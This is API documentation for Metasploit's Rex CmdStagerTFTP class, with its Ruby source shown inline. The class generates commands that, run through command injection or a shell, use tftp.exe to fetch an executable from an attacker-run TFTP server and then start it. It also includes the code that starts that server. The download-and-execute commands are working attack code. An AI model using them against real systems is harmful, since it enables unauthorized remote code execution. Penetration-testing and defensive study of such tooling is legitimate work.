Class: Rex::Exploitation::CmdStagerTFTP

Inherits:
CmdStagerBase show all
Defined in:
lib/rex/exploitation/cmdstager/tftp.rb

Overview

This class provides the ability to create a sequence of commands from an executable. When this sequence is ran via command injection or a shell, the resulting exe will be written to disk and executed.

This particular version uses tftp.exe to download a binary from the specified server. The original file is preserve, not encoded at all, and so this version is significantly simpler than other methods.

Requires: tftp.exe, outbound udp connectivity to a tftp server

Written by Joshua J. Drake

Instance Attribute Summary collapse

Instance Method Summary collapse

Methods inherited from CmdStagerBase

#cmd_concat_operator, #encode_payload, #generate, #generate_cmds, #generate_cmds_decoder, #generate_cmds_payload, #parts_to_commands, #slice_up_payload

Constructor Details

#initialize(exe) ⇒ CmdStagerTFTP

Returns a new instance of CmdStagerTFTP.



28
29
30
31
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 28

def initialize(exe)
  super
  @payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
end

Instance Attribute Details

#exeObject (readonly)

NOTE: We don’t use a concatenation operator here since we only have a couple commands. There really isn’t any need to combine them. Also, the ms01_026 exploit depends on the start command being issued separately so that it can ignore it :)



66
67
68
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 66

def exe
  @exe
end

#payload_exeObject (readonly)

Returns the value of attribute payload_exe.



67
68
69
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 67

def payload_exe
  @payload_exe
end

#tftpObject

Returns the value of attribute tftp.



68
69
70
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 68

def tftp
  @tftp
end

Instance Method Details

#compress_commands(cmds, opts) ⇒ Object

We override compress commands just to stick in a few extra commands last second..



48
49
50
51
52
53
54
55
56
57
58
59
60
61
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 48

def compress_commands(cmds, opts)
  # Initiate the download
  cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"

  # Make it all happen
  cmds << "start #{@tempdir + @payload_exe}"

  # Clean up after unless requested not to..
  if (not opts[:nodelete])
    # XXX: We won't be able to delete the payload while it is running..
  end

  super
end

#setup(mod) ⇒ Object



33
34
35
36
37
38
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 33

def setup(mod)
  tftp = Rex::Proto::TFTP::Server.new
  tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
  tftp.start
  mod.add_socket(tftp) # Hating myself for doing it... but it's just a first demo
end

#teardown(mod = nil) ⇒ Object



40
41
42
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 40

def teardown(mod = nil)
  tftp.stop
end